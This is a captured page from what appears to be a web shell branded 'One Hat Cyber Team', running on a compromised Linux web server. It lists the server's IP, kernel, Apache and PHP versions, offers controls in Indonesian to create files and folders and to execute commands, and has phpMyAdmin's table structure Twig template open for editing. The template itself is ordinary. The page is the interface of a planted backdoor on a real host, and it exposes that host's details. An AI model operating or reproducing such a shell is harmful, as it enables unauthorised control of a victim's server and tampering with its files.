⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.131
Server IP:
157.245.101.34
Server:
Linux skvinfotech-website 5.4.0-131-generic #147-Ubuntu SMP Fri Oct 14 17:07:22 UTC 2022 x86_64
Server Software:
Apache/2.4.41 (Ubuntu)
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
phpmyadmin
/
templates
/
table
/
structure
/
Edit File: table_structure_row.twig
{{ rownum }}
{{ displayed_field_name|raw }}
{{ extracted_columnspec['displayed_type']|raw }} {% if relation_commwork and relation_mimework and browse_mime and mime_map[row['Field']]['mimetype'] is defined %}
MIME: {{ mime_map[row['Field']]['mimetype']|replace({'_': '/'})|lower }} {% endif %}
{% if field_charset is not empty %}
{{ field_charset }}
{% endif %}
{{ attribute }}
{{ row['Null'] == 'YES' ? 'Yes'|trans : 'No'|trans }}
{% if row['Default'] is not null %} {% if extracted_columnspec['type'] == 'bit' %} {{ Util_convertBitDefaultValue(row['Default']) }} {% else %} {{ row['Default']|raw }} {% endif %} {% else %}
{% trans %}None{% context %}None for default{% endtrans %}
{% endif %}
{% if show_column_comments %}
{{ comments }}
{% endif %}
{{ row['Extra']|upper }}
{% if not tbl_is_view and not db_is_system_schema %}
{{ titles['Change']|raw }}
{{ titles['Drop']|raw }}
{% endif %}
Simpan